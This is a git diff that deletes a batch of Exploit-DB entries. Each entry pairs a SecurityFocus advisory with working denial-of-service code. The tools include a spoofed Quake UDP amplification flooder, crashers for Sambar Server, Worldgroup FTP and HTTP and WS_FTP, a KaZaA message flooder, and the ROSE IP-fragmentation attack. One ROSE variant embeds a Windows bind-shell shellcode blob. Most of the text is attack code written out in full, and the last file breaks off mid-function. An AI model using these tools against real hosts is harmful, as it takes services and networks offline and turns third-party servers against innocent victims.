nemesystm of the DHC -http://dhcorp.cjb.net - neme-dhc\@hushmail.com -usage: perl $0 target.com\n" if !defined $ARGV[0]; - -$serverIP = inet_aton($ARGV[0]); -$serverAddr = sockaddr_in(23, $serverIP); -socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); -if (connect (CLIENT, $serverAddr)) { - for ($count = 0; $count <= 15000; $count++) { - send (CLIENT, "A",0); - } - close (CLIENT); -} else { die "Can't connect.\n"; } -print "Done.\n"; - diff --git a/platforms/windows/remote/21016.c b/platforms/windows/remote/21016.c deleted file mode 100755 index d4de6b0e3..000000000 --- a/platforms/windows/remote/21016.c +++ /dev/null @@ -1,229 +0,0 @@ -source: http://www.securityfocus.com/bid/3060/info - - -Quake 3 network play features contain a remotely exploitable denial of service vulnerability. - -A hostile client program can be used by to generate a large number of forged client queries on behalf of a target user. The server's responses flood the target user, consuming the target system's network bandwidth and CPU cycles. - -It has been reported that other games suffer from similar issues. Additional amplification attacks may be possible through the usage of commands which return detailed information about the game status or server information. In some cases, packets larger than 500 bytes may be sent in response to a 50 byte spoofed UDP packet. - -/* - qsmurf.c - Written by Jamal Motsa (Haul@EFnet), based on qflood.c by Andy Gavin (_k3nny@EFnet, k@ETG) - Look at his original post for the original credits. - The anti-script kiddie file descriptor bug has been removed and the code was cleaned up a lot. - - This works based on the fact that when a Quake client connects to a Quake server, much more data - is received by the client than is sent. This program will spoof connections from a target (source - IP Address) to NetQuake servers, which will reply to the target with lots of data with an - amplification rate approaching 20:1. - - Greets to: - Sean Stanek (vulture@EFnet) for doing most of the code optimization. - SFS, WHHS, Marlboro, the Shao Lin - Lithium Node and channel regulars, TPC, X-Tommy, the defunct #BrainFreze Jeff, NEO, Kwizatz@RURC - Sang, zuez, dead-sexy.com and crew, #phear on EFnet, AY, Eric R. for providing me with DNS - - And a big middle finger to: - BTA (for being quite possibly the worse Quake 3 clan in history) - anyone who packets EFnet servers - and finally, to whoever framed OJ -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct sockaddr sa; -struct node -{ - char *address; - struct node *next; - unsigned int ip; -}; - -struct node *head = NULL; -struct node *tail; - -void add_address( struct node **, char * ); -void sig_handler( int ); - -int main( int argc, char **argv ) -{ - int x = 1; - int source_port, delay, fd; - unsigned int ip; - struct sockaddr_in *p; - struct hostent *he; - struct node *current; - char *temp; - - u_char thePACKET[41]= - { - 0x45, /* IP version, header len */ - 0x00, /* IP diff services field */ - 0x00, 0x29, /* IP total length */ - 0xc2, 0xb5, /* IP id */ - 0x00, 0x00, /* IP fragment offset */ - 0x80, /* IP TTL */ - 0x11, /* IP protocol */ - 0, 0, /* IP header checksum */ - 0, 0, 0, 0, /* IP src */ - 0, 0, 0, 0, /* IP dest */ - 0x00, 0x00, /* UDP src port */ - 0, 0, /* UDP dest port */ - 0x00, 0x15, /* length = 21 */ - 0x00, 0x00, /* UDP checksum */ - 0x80, 0x00, /* Quake flags */ - 0x00, 0x0d, /* Quake length */ - 0x01, /* Quake command = connect */ - 0x51, 0x55, 0x41, 0x4b, /* Quake game = QUAKE */ - 0x45, 0x00, - 0x03, 0x01 /* Quake version = 3 */ - }; - - if( argc != 5 ) - { - fprintf( stderr, "\nqsmurf - floods targets with amplified UDP packets using the NetQuake protocol\n" ); - fprintf( stderr, "\tWritten by Jamal Motsa (Haul@EFnet)\n" ); - fprintf( stderr, "\tUsage: %s \n", *argv ); - fprintf( stderr, "\t\tservers = comma-delimited list of IP Address/hostnames of Quake servers\n" ); - fprintf( stderr, "\t\tsrc = IP Address/hostname of target\n" ); - fprintf( stderr, "\t\tserver_port = Quake server port\n" ); - fprintf( stderr, "\t\tdelay = delay between connection requests (in usec, 0 for no delay)\n" ); - fprintf( stderr, "\t\texample: %s 10.0.0.2,10.0.0.3 10.0.0.10 26000 50000\n\n", argv[0] ); - exit( 0 ); - } - - srand( time( NULL )); - delay = atoi( argv[4] ); - - /* build a linked list of addresses entered on command line */ - temp = strtok( argv[1], "," ); - add_address( &head, temp ); - - signal( SIGINT, sig_handler ); - - tail = head; - - temp = strtok( NULL, "," ); - while( temp != NULL ) - { - add_address( &(tail->next), temp ); - tail = tail->next; - temp = strtok( NULL, "," ); - } - - current = head; - - if(( fd=socket( AF_INET, SOCK_RAW, IPPROTO_RAW )) == -1 ) - { - perror( "Can't create raw socket (you must run as root)" ); - exit( 0 ); - } - - if( setsockopt( fd, IPPROTO_IP, IP_HDRINCL, (char*)&x, sizeof(x)) < 0 ) - { - perror( "setsockopt IP_HDRINCL error" ); - exit( 0 ); - } - - if( ( he = gethostbyname( argv[2]) ) == NULL ) - { - fprintf( stderr, "Can't resolve src\n" ); - exit( 0 ); - } - - bcopy( *( he->h_addr_list ), &ip, 4 ); - - - while( 1 ) - { - while( current != NULL ) - { - bcopy( &ip, ( thePACKET + 16 ), 4 ); - bcopy( &(current->ip), ( thePACKET + 16 ), 4 ); - - source_port = rand() % 3976 + 1024; - - *(u_short*)(thePACKET + 20) = htons( (u_short) source_port ); - *(u_short*)(thePACKET + 22) = htons( (u_short) atoi( argv[3] )); - - p = ( struct sockaddr_in* ) &sa; - p->sin_family = AF_INET; - bcopy( ¤t->ip, &(p->sin_addr), 4 ); - - if(( sendto( fd, &thePACKET, sizeof(thePACKET), 0, (struct sockaddr*)p, sizeof(struct sockaddr ))) == -1) - { - perror( "sendto error" ); - exit( 0 ); - } - - printf( "Quake connection request sent from %s:%i to %s:%s\n", argv[2], source_port, current->address, -argv[3] ); - - if( delay > 0 ) usleep( delay ); - current = current->next; - } - current = head; - } - exit( 1 ); -} - -void add_address( struct node** reference, char *data ) -{ - struct hostent * he; - struct node* new_node = malloc( sizeof( struct node )); - - new_node->address = data; - new_node->next = *reference; - - if( ( he = gethostbyname( new_node->address )) == NULL ) - { - fprintf( stderr, "Can't resolve server\n"); - exit( 0 ); - } - bcopy( *( he->h_addr_list ), &(new_node->ip), 4 ); - - *reference = new_node; -} - -void sig_handler( int number ) -{ - struct node *current = head; - struct node *next; - - printf( "\nCaught SIGINT. Cleaning up memory..." ); - while( current != NULL ) - { - next = current->next; - free( current ); - current = next; - } - printf( "done.\n\n" ); - exit( 1 ); -} - - - - - - - - - - - diff --git a/platforms/windows/remote/21040.txt b/platforms/windows/remote/21040.txt deleted file mode 100755 index 8ab61dba2..000000000 --- a/platforms/windows/remote/21040.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/3113/info - -A potential denial of service vulnerability exists in some versions of the Microsoft Windows network stack. - -The problem occurs when a large number of extraneous ARP packets sent to a host running Windows. This can cause the system to use all available CPU and memory resources and thus become unresponsive until the attack ends. - -By sending ARP requests to the Ethernet broadcast address, it may be possible to use this attack to disable an entire network. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21040.tar.gz \ No newline at end of file diff --git a/platforms/windows/remote/21228.c b/platforms/windows/remote/21228.c deleted file mode 100755 index 6cc88e859..000000000 --- a/platforms/windows/remote/21228.c +++ /dev/null @@ -1,102 +0,0 @@ -source: http://www.securityfocus.com/bid/3885/info - -Sambar Server is a multi-threaded web server which will run on Microsoft Windows 9x/ME/NT/2000 operating systems. - -It is possible to cause a denial of service to Sambar Server by sending consecutive excessively long requests to the 'cgitest.exe' sample script. - -The possibility exists that this issue may be the result of improper bounds checking. As a result, this vulnerability may potentially be used to execute arbitrary code on the host running the vulnerable software. Though this has not been confirmed. - -While this issue was reported for Sambar Server 5.1, other versions may also be affected. - -/********************************************************************* -********** -** -** 06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW - -** -** Compiled with gcc under linux with kernel 2.4.17 - -** -** Programname: Sambar Server 5.0 Manufacturer:Jalyn - -** -********************************************************************** -*********/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SERVER_PORT 80 -#define MAX_MSG 100 - - int sd, rc, i,j; - char buf[5000]; - char msgtosnd[5024]; - char msgtoget[102400]; - char source[200000]; - struct sockaddr_in localAddr, servAddr; - struct hostent *h; - FILE *f1; - -int main (int argc, char *argv[]) { -printf("Sleepy of Yast presents \"Sambar Server Production 5.0 -Crasher\"\n"); -if(argc != 2) -{ -printf(">>> usage: %s ",argv[0]);exit(0); -}; -h = gethostbyname(argv[1]); -if(h==NULL) -{ -printf("%s: unknown host '%s'\n",argv[0],argv[1]); -exit(1); -} -servAddr.sin_family = h->h_addrtype; -memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], -h->h_length); -servAddr.sin_port = htons(SERVER_PORT); -sd = socket(AF_INET, SOCK_STREAM, 0); -if(sd<0) -{ -perror("cannot open socket "); -exit(1); -} - -localAddr.sin_family = AF_INET; -localAddr.sin_addr.s_addr = htonl(INADDR_ANY); -localAddr.sin_port = htons(0); -rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); - -if(rc<0) -{ -printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT); -perror("error "); -exit(1); -} -rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); -if(rc<0) -{ -perror("cannot connect "); -exit(1); -}; -strcpy(buf,"A"); -fprintf(stderr,"Entering Loop\n"); -for(i=1;i<4000;i++) -{ -strcat(buf,"A"); -} -sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost: -localhost\n\n\n",buf); -for(j=0;j<5;j++) -{ -send(sd,msgtosnd,5024,0); -} -printf("\n\n BOOOOM"); -} diff --git a/platforms/windows/remote/21305.c b/platforms/windows/remote/21305.c deleted file mode 100755 index 1d47052ce..000000000 --- a/platforms/windows/remote/21305.c +++ /dev/null @@ -1,112 +0,0 @@ -source: http://www.securityfocus.com/bid/4185/info - - -Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers. - -A vulnerability has been reported in the FTP server included with Worldgroup. If a LIST command is received by the server including a long string of '*/../' characters, the server may halt. A restart may be required in order to regain normal functionality. - -Earlier versions of Worldgroup may share this vulnerability. - -/* - by Limpid Byte project - http://lbyte.void.ru - lbyte@host.sk - -[Worldgroup FTP Server Denial of Service] -More than 105 "/" in LIST command. - -*/ - -#include -#include -#include -#include - -#define FOUND "220" - -int main(int argc, char *argv[]) -{ - int sock; - struct sockaddr_in blah; - struct hostent *he; - char cgiBuff[1024]; - char *cgiPage[6]; - WSADATA wsaData; - char cr[] = "\n"; - - if (argc < 3) - { -printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); -printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); -printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); -printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); - exit(1); - } - cgiPage[0] = "USER "; - cgiPage[1] = (argv[2]); - cgiPage[2] = "PASS "; - cgiPage[3] = (argv[3]); - cgiPage[4] = "PASV"; - cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n"; - - if(WSAStartup(0x101,&wsaData)) - { - printf("Unable to initialize WinSock lib.\n"); - exit(1); - } -printf("Let's crash the World!\n\r"); -printf("Coded by the [eaSt]:\n\r"); -printf("\nConnecting %s on port 21...\n\n", argv[1]); - - sock = socket(AF_INET,SOCK_STREAM,0); - blah.sin_family=AF_INET; - blah.sin_addr.s_addr=inet_addr(argv[1]); - blah.sin_port=htons(21); - if ((he = gethostbyname(argv[1])) != NULL) - { - memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); - } - else - { - if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) - { - WSACleanup(); - exit(1); - } - } - - if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) - { - WSACleanup(); - exit(1); - } - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf("<< %s", cgiBuff); - send(sock,cgiPage[0],strlen(cgiPage[0]),0); - send(sock,cgiPage[1],strlen(cgiPage[1]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff); - send(sock,cgiPage[2],strlen(cgiPage[2]),0); - send(sock,cgiPage[3],strlen(cgiPage[3]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff); - send(sock,cgiPage[4],strlen(cgiPage[4]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s\n<< %s", cgiPage[4], cgiBuff); - send(sock,cgiPage[5],strlen(cgiPage[5]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s\n<< %s", cgiPage[5], cgiBuff); - - printf("Try reconnect to %s\n", argv[1]); - WSACleanup(); - return 0; -} diff --git a/platforms/windows/remote/21306.c b/platforms/windows/remote/21306.c deleted file mode 100755 index 2b60f0590..000000000 --- a/platforms/windows/remote/21306.c +++ /dev/null @@ -1,110 +0,0 @@ -source: http://www.securityfocus.com/bid/4186/info - -Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers. - -A vulnerability has been reported in the web server included with Worldgroup. If a HTTP GET request is received by the server consisting of a long string of arbitrary characters, the server will crash. A restart may be required in order to regain normal functionality. - -Earlier versions of Worldgroup may share this vulnerability. - -/* - by Limpid Byte project - http://lbyte.void.ru - lbyte@host.sk - -Worldgroup Server Denial of Service for -Windows 9x/ME only. -Error between system fuction windows and -worldgroup from web interface. -REGUEST: -GET /signup/a.[aaaaaaaa....aaaa] - -*/ - -#include -#include -#include -#include - -#define FOUND "200" - -int main(int argc, char *argv[]) -{ - int sock, count; - struct sockaddr_in blah; - struct hostent *he; - char cgiBuff[1024]; - WSADATA wsaData; - - if (argc < 2) - { - printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n"); - printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n"); - printf(" USAGE : www_dos.exe [HOST] \n"); - printf(" example : www_dos.exe 127.0.0.1 \n"); - exit(1); - } - - if(WSAStartup(0x101,&wsaData)) - { - printf("Unable to initialize WinSock lib.\n"); - exit(1); - } - printf("Let's crash the World!\n"); - printf("Coded by the [eaSt]:\n"); - printf("\nScanning %s on port 80...\n\n", argv[1]); - - for (count = 0; count < 94; count++) - { - sock = socket(AF_INET,SOCK_STREAM,0); - blah.sin_family=AF_INET; - blah.sin_addr.s_addr=inet_addr(argv[1]); - blah.sin_port=htons(80); - if ((he = gethostbyname(argv[1])) != NULL) - { - memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); - } - else - { - if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) - { - WSACleanup(); - exit(1); - } - } - - if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) - { - WSACleanup(); - exit(1); - } - - memset(cgiBuff, 0, sizeof(cgiBuff)); - sprintf(cgiBuff, "GET /signup/"); - memset(cgiBuff + 12, 'a', 219 + count); - sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n"); - printf("Sending: %d symbols request\n", strlen(cgiBuff)); - - send(sock,cgiBuff,strlen(cgiBuff),0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) { - printf("Crashed\n"); - } - else { - cgiBuff[32] = 0; - if (strstr(cgiBuff,FOUND)) - { - printf("Send (%s)\n", cgiBuff); - } - else - { - printf("Not Found (%s)\n", cgiBuff); - } - } - - closesocket(sock); - } - - printf("Try reconnect to %s\n", argv[1]); - WSACleanup(); - return 0; -} diff --git a/platforms/windows/remote/21307.txt b/platforms/windows/remote/21307.txt deleted file mode 100755 index 683cb2fde..000000000 --- a/platforms/windows/remote/21307.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/4187/info - -The Bat! is an e-mail client for Microsoft Windows operating systems. - -A problem occurs with The Bat! when it is configured to save attachments seperately from the body of a message. It is possible to include a MS-DOS device name (such as CON, AUX, PRN, etc.) in the filename of the attachment to cause a denial of service to an e-mail client with this configuration. - -This appears to be an issue with The Bat! version 1.53d. Earlier versions do not appear to be affected. - -bash-2.03$ sendmail -U test@test.com -From: test -To: test -Content-Type: apllication/exe; name=lpt1 - -Test \ No newline at end of file diff --git a/platforms/windows/remote/21653.c b/platforms/windows/remote/21653.c deleted file mode 100755 index bf437894d..000000000 --- a/platforms/windows/remote/21653.c +++ /dev/null @@ -1,95 +0,0 @@ -source: http://www.securityfocus.com/bid/5317/info - -KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition. - -/* - kazaa denial of service attack - by Josh and omega -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 1214 - - -int main(int argc, char *argv[]) -{ - int fd, numbytes, randnum, k; - struct hostent *host; - struct sockaddr_in them; - char buf2[4026]; - char buf[5000]; - char *bigboy; - int i, size, j; - - - memset(buf2, 'a', sizeof(buf2)); - buf2[sizeof(buf2)-1]='\0'; - srand(time(NULL)); - - if (argc < 5) - { - fprintf(stderr,"usage: %s <(this*4026) bytes per message> \n", argv[0]); - exit(1); - } - if ((host=gethostbyname(argv[1])) == NULL) - { - perror("gethostbyname"); - exit(1); - } - - them.sin_family = AF_INET; - them.sin_port = htons(PORT); - them.sin_addr = *((struct in_addr *)host->h_addr); - memset(&(them.sin_zero), '\0', 8); - - - size=(4042*atoi(argv[2]))+280+1; - bigboy=(char *)malloc(size); - - snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]); - - /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */ - snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2); - for(k=0;k \n\n"; - - exit(); - -} - - -$host = $ARGV[0]; - -$port = $ARGV[1]; - -$numc = $ARGV[2]; - - - -use Net::Telnet (); - -$t = new Net::Telnet; - -$t->open(Host => $host,Port => $port); - -foreach(1...$numc) { - - $t->waitfor('/.*host.*/'); - - $t->print('localhost:23'); - -} diff --git a/platforms/windows/remote/24211.txt b/platforms/windows/remote/24211.txt deleted file mode 100755 index 28fd4085b..000000000 --- a/platforms/windows/remote/24211.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/10552/info - -A vulnerability is reported to exist in Internet Explorer that may allow an attacker to cause the application to crash. The issue presents itself when a user attempts to invoke the "Save As" option on a malicious HREF URI. - -When this URI is processed the issue leads to a crash in the running instance of Internet Explorer and all windows spawned from this instance. - -
Right Click aOn Me And Click "Save Target As" \ No newline at end of file diff --git a/platforms/windows/remote/24416.txt b/platforms/windows/remote/24416.txt deleted file mode 100755 index ba09bfe15..000000000 --- a/platforms/windows/remote/24416.txt +++ /dev/null @@ -1,18 +0,0 @@ -source: http://www.securityfocus.com/bid/11065/info - -WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command. - -WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well. - -E:\>ftp localhost -Connected to ibm. -220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167) -220-Fri Aug 27 14:12:19 2004 -220-29 days remaining on evaluation. -220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167) -User (ibm:(none)): ftp -331 Password required -Password: -230 user logged in -ftp> cd a../a -Connection closed by remote host. \ No newline at end of file diff --git a/platforms/windows/remote/24634.c b/platforms/windows/remote/24634.c deleted file mode 100755 index aa6e8499b..000000000 --- a/platforms/windows/remote/24634.c +++ /dev/null @@ -1,233 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - - -/*** - ROSE attack (variation 2) (chuck (at) lemure.net) - - Discovered by: - gandalf (at) digital.net - - code modified from large IGMP attack by: - Kox by Coolio (coolio (at) k-r4d.com) - - Sends out small IP fragments totalling up to a large - ICMP packet. Then repeatedly sends last IP Fragment forcing - reassembly code to traverse to last IP fragment in order to - do a free() followed by a malloc(). Or so it seems. - - Reportedly works for TCP / UDP as well, since this is - a IP layer attack. - - -***/ - -/* just a thousand kills win XP */ - -#define NUM_PACKETS 100 - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -void usage(char *arg) -{ - printf("Rose attack\n"); - printf("Usage: %s [source]\n", arg); - printf("If source not specified, will send out from random ip's\n"); - exit(1); -} - - -unsigned int randip() -{ - struct hostent *he; - struct sockaddr_in sin; - char *buf = (char *)calloc(1, sizeof(char) * 16); - - sprintf(buf, "%d.%d.%d.%d", - (random()%191)+23, - (random()%253)+1, - (random()%253)+1, - (random()%253)+1); - - return inet_addr(buf); - -} - -unsigned short in_cksum(unsigned short *buh, int len) -{ - register long sum = 0; - unsigned short oddbyte; - register unsigned short answer; - - while(len > 1) { - sum += *buh++; - len -= 2; - } - - if(len == 1) { - oddbyte = 0; - *((unsigned char *)&oddbyte) = *(unsigned char *)buh; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xFFFF); - sum += (sum >> 16); - answer = ~sum; - return answer; -} - -int fire_away(struct sockaddr_in *victim, unsigned long src) -{ - int SMALLICMP = 1; - unsigned char *pkt; - struct iphdr *ip; - struct igmphdr *igmp; - struct icmphdr *icmp_pkt; - struct utsname *un; - struct passwd *p; - int idList[NUM_PACKETS]; - unsigned long j; - int i, s; - int id = (random() % 40000) + 500; - for (i=0;iversion = 4; - ip->ihl = (sizeof *ip) / 4; - ip->ttl = 255; - ip->tot_len = htons(SMALLICMP); - ip->protocol = 1; - ip->id = htons(id); - ip->frag_off = htons(IP_MF); - ip->saddr = src; - ip->daddr = victim->sin_addr.s_addr; - ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); - - - icmp_pkt->type = ICMP_ECHO; - icmp_pkt->code = 0; - icmp_pkt->checksum = 1000; - icmp_pkt->un.echo.id = random() % 255; - icmp_pkt->un.echo.sequence = random() % 255; - - for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1; - i < SMALLICMP; i++){ - pkt[i] = random() % 255; - - } - - if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { - perror("error: socket()"); - return 1; - } - - printf(" Sending out series of small fragments\r\n"); - - for(i=0;iid = htons(idList[i]); - for (j=0; j<8170; j += SMALLICMP + 1){ - ip->frag_off = htons(j | IP_MF); - if(sendto(s, pkt, - SMALLICMP + sizeof(struct iphdr), - 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)) == -1) { - perror("error: sendto()"); - return 1; - } - } - } - - printf(" Sending out tailing fragments\r\n"); - /* big frag at end... */ - /* sending a large amount of the end fragments over and - over. This is definitely overkill, but seems to work */ - for (j=0;j<9999*NUM_PACKETS;j++){ - for(i=0;iid=htons(idList[i]); - ip->frag_off = htons(8190|IP_MF); - //ip->frag_off = htons(8100 | IP_MF); - sendto(s, pkt, sizeof(struct iphdr) + SMALLICMP, - 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)); - /* if you do sleep, CPU usage goes way down. But memory usage - still creeps upward */ - //usleep(100); //sleep after every trailing packet - } - usleep(100); //sleep after every series of NUM_PACKETS - } - free(pkt); - close(s); - return 0; -} - -int main(int argc, char *argv[]) -{ - struct sockaddr_in victim; - struct hostent *he; - unsigned long source; - int i; - - srandom(time(NULL)); - - if(argc < 2) - usage(argv[0]); - - if((he = gethostbyname(argv[1])) == NULL) { - herror(argv[1]); - exit(1); - } - - if (argc > 2){ - source = inet_addr(argv[2]); - } - else { - source = randip(); - } - - memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); - victim.sin_port = htons(0); - victim.sin_family = PF_INET; - - printf("Sending ICMP fragments: \r\n"); - fflush(stdout); - fire_away(&victim, source); - if (argc < 3){ - source = randip(); - } - - fflush(stdout); - printf("\nDONE\n"); - fflush(stdout); -} diff --git a/platforms/windows/remote/24635.c b/platforms/windows/remote/24635.c deleted file mode 100755 index 79cb2aadc..000000000 --- a/platforms/windows/remote/24635.c +++ /dev/null @@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - -/*** - ROSE attack (chuck (at) lemure.net) - - Discovered by: - gandalf@digital.net - - code modified from large IGMP attack by: - Kox by Coolio (coolio@k-r4d.com) - - - Sends out first and last ICMP packet echo request. - Reportedly works for TCP / UDP as well, since this is - a IP layer attack. - - Eats up all available packets for fragmentation reassembly. - - -***/ - -/* just a thousand kills win XP */ - -#define NUM_PACKETS 1000 - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include - -/* Figured I try sending some shell code for my random payload... - doesn't do anything -*/ - -char code[] = -"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86" -"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc" -"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3" -"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89" -"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c" -"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59" -"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06" -"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e" -"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff" -"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31" -"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55" -"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81" -"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6" -"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c" -"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49" -"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff" -"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57" -"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18" -"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc" -"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c" -"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c" -"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d" -"\x5b\xc2\x08\x00"; - -void usage(char *arg) -{ - printf("Rose attack\n"); - printf("Usage: %s [source]\n", arg); - printf("If source not specified, will send out from random ip's\n"); - exit(1); -} - - -unsigned int randip() -{ - struct hostent *he; - struct sockaddr_in sin; - char *buf = (char *)calloc(1, sizeof(char) * 16); - - sprintf(buf, "%d.%d.%d.%d", - (random()%191)+23, - (random()%253)+1, - (random()%253)+1, - (random()%253)+1); - - - - return 